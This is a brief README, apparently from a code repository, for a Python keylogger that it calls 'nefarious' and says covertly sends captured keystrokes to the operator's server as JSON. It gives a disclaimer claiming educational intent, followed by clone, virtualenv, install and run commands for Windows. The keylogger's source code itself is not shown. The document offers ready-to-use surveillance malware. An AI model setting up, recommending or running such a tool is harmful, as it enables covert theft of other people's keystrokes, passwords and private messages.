A simple but nefarious Python Keylogger with minimal dependencies (pynput & requests) that will hiddenously sending data to your server in JSON Format
This code DOES NOT promote or encourage any illegal activities! The content in this document is provided solely for educational purposes and to create awareness!
Open Terminal and Write:
git clone https://github.com/davidbombal/python-keylogger.git
Type in the terminal. cd python-keylogger
Upgrade your virtual environment on Windows Machine
pip install --upgrade virtualenv
Create Virtual Environment in Windows. Using command
python -m venv keylogger_env
Activating the Virtual Environment keylogger_env\Scripts\activate
Run the command to install all the packages required in your virtual environment. pip install -r requirements.txt
For running the program , Run command python Tapper.py